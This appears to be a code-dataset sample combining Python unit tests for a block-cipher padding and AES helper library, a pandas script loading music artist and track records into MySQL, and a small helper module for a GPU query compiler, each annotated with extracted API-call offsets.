[((884, 913), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', 'INDENT1'], {}), '(original_str, INDENT1)\n', (890, 913), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1005, 1034), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', 'INDENT2'], {}), '(original_str, INDENT2)\n', (1011, 1034), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1127, 1156), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', 'INDENT3'], {}), '(original_str, INDENT3)\n', (1133, 1156), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1250, 1279), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', 'INDENT4'], {}), '(original_str, INDENT4)\n', (1256, 1279), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1635, 1653), 'observatory.platform.cli.click_utils.comment', 'comment', (['input_str'], {}), '(input_str)\n', (1642, 1653), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1745, 1763), 'observatory.platform.cli.click_utils.comment', 'comment', (['input_str'], {}), '(input_str)\n', (1752, 1763), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1456, 1479), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', '(0)'], {}), '(original_str, 0)\n', (1462, 1479), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1541, 1565), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', '(-1)'], {}), '(original_str, -1)\n', (1547, 1565), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n')]
|
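A quick interactive sketch of the two helpers exercised above, assuming the observatory package is installed; the expected outputs follow from the assertions in the test.
from observatory.platform.cli.click_utils import INDENT1, comment, indent
print(indent("hello world", INDENT1))  # '  hello world' (2 spaces)
print(comment("hello world"))           # '# hello world'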
#!/usr/bin/env python
# encoding: utf-8
"""
Test block crypto.
"""
import unittest
import matasano.blocks
import matasano.util
__author__ = 'aldur'
class BlocksTestCase(unittest.TestCase):
def test_split_blocks(self):
f = matasano.blocks.split_blocks
b = "this is a test".encode("ascii")
k_len = 3
blocks = f(b, k_len)
self.assertEqual(
len(blocks),
k_len
)
self.assertEqual(
sum(len(i) for i in blocks),
len(b)
)
l = list()
for i in range(len(blocks[0])):
for j in range(len(blocks)):
try:
l.append(blocks[j][i])
except IndexError:
pass
l = bytes(l)
self.assertEqual(
b, l
)
self.assertEqual(
b.decode("ascii"),
l.decode("ascii")
)
def test_pkcs_7(self):
b = "YELLOW SUBMARINE".encode("ascii")
size = 20
padded = matasano.blocks.pkcs_7(b, size)
self.assertEqual(len(padded), size)
self.assertEqual(padded, b + b"\x04" * 4)
size = 16
padded = matasano.blocks.pkcs_7(b, size)
self.assertEqual(len(padded), size * 2)
self.assertEqual(padded, b + (b"\x10" * size))
def test_pkcs_1_5(self):
b = "YELLOW SUBMARINE".encode("ascii")
size = 20
padded = matasano.blocks.pkcs_1_5(b, size)
self.assertEqual(
padded.to_bytes(size, "big"), b"\x00\x02\xff\x00" + b
)
unpadded = matasano.blocks.un_pkcs_1_5(padded, size)
self.assertEqual(
b, unpadded
)
self.assertRaises(
matasano.blocks.BadPaddingException,
matasano.blocks.un_pkcs_1_5,
padded << 1, size
)
def test_un_pkcs(self):
b = "YELLOW SUBMARINE".encode("ascii")
size = 20
padded = matasano.blocks.pkcs_7(b, size)
un_padded = matasano.blocks.un_pkcs_7(padded, size)
self.assertEqual(b, un_padded)
size = 16
padded = matasano.blocks.pkcs_7(b, size)
un_padded = matasano.blocks.un_pkcs_7(padded, size)
self.assertEqual(b, un_padded)
padded = b"ICE ICE BABY\x04\x04\x04\x04"
un_padded = matasano.blocks.un_pkcs_7(padded, size)
self.assertEqual(b"ICE ICE BABY", un_padded)
padded = b"ICE ICE BABY\x05\x05\x05\x05"
self.assertRaises(
matasano.blocks.BadPaddingException,
matasano.blocks.un_pkcs_7,
padded,
size
)
padded = b"ICE ICE BABY\x01\x02\x03\x04"
self.assertRaises(
matasano.blocks.BadPaddingException,
matasano.blocks.un_pkcs_7,
padded,
size
)
def test_aes_ecb(self):
f = matasano.blocks.aes_ecb
key = "YELLOW SUBMARINE".encode("ascii")
b = "00foobarfoobar00".encode("ascii")
self.assertEqual(
f(key, f(key, b), decrypt=True),
b
)
def test_aes_cbc(self):
f = matasano.blocks.aes_cbc
key = "YELLOW SUBMARINE".encode("ascii")
b = "00foobarfoobar00".encode("ascii")
iv = matasano.util.random_aes_key()
self.assertEqual(
f(key, f(key, b)[0], decrypt=True)[0],
b
)
self.assertEqual(
f(key, f(key, b, iv=iv)[0], decrypt=True, iv=iv)[0],
b
)
def test_aes_ctr(self):
f = matasano.blocks.aes_ctr
key = "YELLOW SUBMARINE".encode("ascii")
b = "00foobarfoobar00".encode("ascii")
self.assertEqual(
f(key, f(key, b)[0])[0],
b
)
def test_bytes_in_blocks(self):
f = matasano.blocks.bytes_in_block
size = 16
self.assertEqual(
f(size, 0),
slice(0, size)
)
self.assertEqual(
f(size, 1),
slice(size, size * 2)
)
def test_bytes_to_block(self):
f = matasano.blocks.bytes_to_block
size = 16
self.assertEqual(
f(size, 0),
slice(0, size)
)
self.assertEqual(
f(size, 1),
slice(0, size * 2)
)
self.assertEqual(
f(size, 10),
slice(0, size * 11)
)
def test_ith_byte_in_block(self):
f = matasano.blocks.ith_byte_block
size = 16
self.assertEqual(
f(size, 0),
0
)
self.assertEqual(
f(size, 1),
0
)
self.assertEqual(
f(size, size),
1
)
self.assertEqual(
f(size, size * 2),
2
)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main"
] |
[((4893, 4908), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4906, 4908), False, 'import unittest\n')]
|
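A self-contained sketch of the PKCS#7 rule the pkcs_7 tests above assert: pad with k copies of the byte k, where k = size - (len(b) % size), so an already-aligned input gains one full block. This re-implements the rule for illustration; it is not the matasano.blocks code.
def pkcs_7_sketch(b: bytes, size: int) -> bytes:
    k = size - len(b) % size  # number of padding bytes, 1..size
    return b + bytes([k] * k)
assert pkcs_7_sketch(b"YELLOW SUBMARINE", 20) == b"YELLOW SUBMARINE" + b"\x04" * 4
assert pkcs_7_sketch(b"YELLOW SUBMARINE", 16) == b"YELLOW SUBMARINE" + b"\x10" * 16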
import pandas as pd
import mysql.connector
from mysql.connector import errorcode
import math
import sys
import csv
# MySQL connection configuration
try:
cnx = mysql.connector.connect(user='user_taller1', password='<PASSWORD>.', host='127.0.0.1', database='taller1')
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
cursor = cnx.cursor()
# Read the dataframe
columns_data = ['userId','timestamp','musicbrainz-artist-id', 'artist-name','trackId','trackname']
#df_use_habits= pd.DataFrame(columns = ['userId','timestamp','musicbrainz-artist-id', 'artist-name','trackId','trackname'])
df_artist= pd.DataFrame(columns = ['musicbrainz-artist-id', 'artist-name'])
df_tracks= pd.DataFrame(columns = ['trackId','trackname'] )
chunksize = 10 ** 6
#with pd.read_csv('data/userid-timestamp-artid-artname-traid-traname.tsv', encoding="utf-8", delimiter='\r', chunksize=chunksize, header=None) as reader:
with pd.read_csv('data/clean.tsv', encoding="utf-8", delimiter='\t', chunksize=chunksize, header=None, names=columns_data) as reader:
for chunk in reader:
df_artist = df_artist.append(chunk[['musicbrainz-artist-id', 'artist-name']])
df_tracks = df_tracks.append(chunk[['trackId','trackname']])
#print(df_artist)
print("Finish reading file and dtaframes")
# Remove duplicates
df_artist= df_artist.drop_duplicates(keep='first')
df_artist = df_artist.reset_index(drop=True)
df_tracks= df_tracks.drop_duplicates(keep='first')
df_tracks = df_tracks.reset_index(drop=True)
# Create a new record
sql_tracks = "INSERT INTO `tracks` (`music_track_id`, `music_track_name`) VALUES (%s, %s)"
sql_artists = "INSERT INTO `artists` (`music_artist_id`, `music_artist_name`) VALUES (%s, %s)"
def isNaN(string):
return string != string
for i in df_tracks.index:
# Execute the query
var1= None if isNaN(df_tracks['trackId'][i]) else ''.join([c for c in df_tracks['trackId'][i].strip() if c not in ['\t', '\n', '\f', '\r','\u000B','\u0085','\u2028','\u2029','\u0022', '\u005C', '\u0027', '"']])
var2= None if isNaN(df_tracks['trackname'][i]) else ''.join([c for c in df_tracks['trackname'][i].strip() if c not in ['\t', '\n', '\f', '\r','\u000B','\u0085','\u2028','\u2029','\u0022', '\u005C', '\u0027', '"']])
#print(var2)
try:
cursor.execute(sql_tracks, (var1,var2))
except mysql.connector.errors.DataError as err:
print("Track var 1: "+ var1+ " ")
print("Track var 2: "+ var2+ " ")
print("nooooo" + df_tracks['trackname'][i])
sys.exit(1)
# the connection is not autocommitted by default. So we must commit to save our changes.
cnx.commit()
for i in df_artist.index:
# Execute the query
var1= None if isNaN(df_artist['musicbrainz-artist-id'][i]) else ''.join([c for c in df_artist['musicbrainz-artist-id'][i].strip() if c not in ['\t', '\n', '\f', '\r','\u000B','\u0085','\u2028','\u2029','\u0022', '\u005C', '\u0027', '"']])
var2= None if isNaN(df_artist['artist-name'][i]) else ''.join([c for c in df_artist['artist-name'][i].strip() if c not in ['\t', '\n', '\f', '\r','\u000B','\u0085','\u2028','\u2029','\u0022', '\u005C','\u0027', '"' ]])
#print(var2)
try:
cursor.execute(sql_artists, (var1,var2))
except mysql.connector.errors.DataError as err:
print("Artists var 1: "+ var1+ " ")
print("Artists var 2: "+ var2+ " ")
sys.exit(1)
# the connection is not autocommitted by default. So we must commit to save our changes.
cnx.commit()
#print(df_artist)
cursor.close()
cnx.close()
|
[
"pandas.DataFrame",
"pandas.read_csv",
"sys.exit"
] |
[((816, 878), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['musicbrainz-artist-id', 'artist-name']"}), "(columns=['musicbrainz-artist-id', 'artist-name'])\n", (828, 878), True, 'import pandas as pd\n'), ((892, 938), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['trackId', 'trackname']"}), "(columns=['trackId', 'trackname'])\n", (904, 938), True, 'import pandas as pd\n'), ((1121, 1243), 'pandas.read_csv', 'pd.read_csv', (['"""data/clean.tsv"""'], {'encoding': '"""utf-8"""', 'delimiter': '"""\t"""', 'chunksize': 'chunksize', 'header': 'None', 'names': 'columns_data'}), "('data/clean.tsv', encoding='utf-8', delimiter='\\t', chunksize=\n chunksize, header=None, names=columns_data)\n", (1132, 1243), True, 'import pandas as pd\n'), ((2690, 2701), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2698, 2701), False, 'import sys\n'), ((3524, 3535), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3532, 3535), False, 'import sys\n')]
|
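A hedged alternative sketch for the row-by-row insert loops above: cursor.executemany() pushes the whole batch through one parameterized statement (same table and columns as the script; assumes cnx/cursor are open and the NaN/control-character cleanup above has already been applied).
rows = list(df_tracks[['trackId', 'trackname']].itertuples(index=False, name=None))
cursor.executemany(
    "INSERT INTO `tracks` (`music_track_id`, `music_track_name`) VALUES (%s, %s)",
    rows,
)
cnx.commit()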
from dogqc.code import Code
# includes
def getIncludes ():
code = Code()
code.add("#include <list>")
code.add("#include <unordered_map>")
code.add("#include <vector>")
code.add("#include <iostream>")
code.add("#include <ctime>")
code.add("#include <limits.h>")
code.add("#include <float.h>")
code.add("#include \"../dogqc/include/csv.h\"")
code.add("#include \"../dogqc/include/util.h\"")
code.add("#include \"../dogqc/include/mappedmalloc.h\"")
return code
def getCudaIncludes ():
code = Code()
code.add("#include \"../dogqc/include/util.cuh\"")
code.add("#include \"../dogqc/include/hashing.cuh\"")
return code
class Type ( object ):
MULTI_HT = "multi_ht"
UNIQUE_HT = "unique_ht"
AGG_HT = "agg_ht"
class Const ( object ):
ALL_LANES = "ALL_LANES"
class Krnl ( object ):
INIT_AGG_HT = "initAggHT"
INIT_ARRAY = "initArray"
INIT_UNIQUE_HT = "initUniqueHT"
INIT_MULTI_HT = "initMultiHT"
# functions
class Fct ( object ):
HASH_BUILD_UNIQUE = "hashBuildUnique"
HASH_PROBE_UNIQUE = "hashProbeUnique"
HASH_COUNT_MULTI = "hashCountMulti"
HASH_INSERT_MULTI = "hashInsertMulti"
HASH_PROBE_MULTI = "hashProbeMulti"
HASH = "hash"
HASH_AGG_BUCKET = "hashAggregateGetBucket"
HASH_AGG_CHECK = "hashAggregateFindBucket"
|
[
"dogqc.code.Code"
] |
[((71, 77), 'dogqc.code.Code', 'Code', ([], {}), '()\n', (75, 77), False, 'from dogqc.code import Code\n'), ((543, 549), 'dogqc.code.Code', 'Code', ([], {}), '()\n', (547, 549), False, 'from dogqc.code import Code\n')]
|
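A minimal sketch of driving the Code builder above; add() is the only Code method this row shows, so anything beyond appending lines is an assumption.
code = getIncludes()
code.add("// kernel prologue goes here")
code.add("int main() { return 0; }")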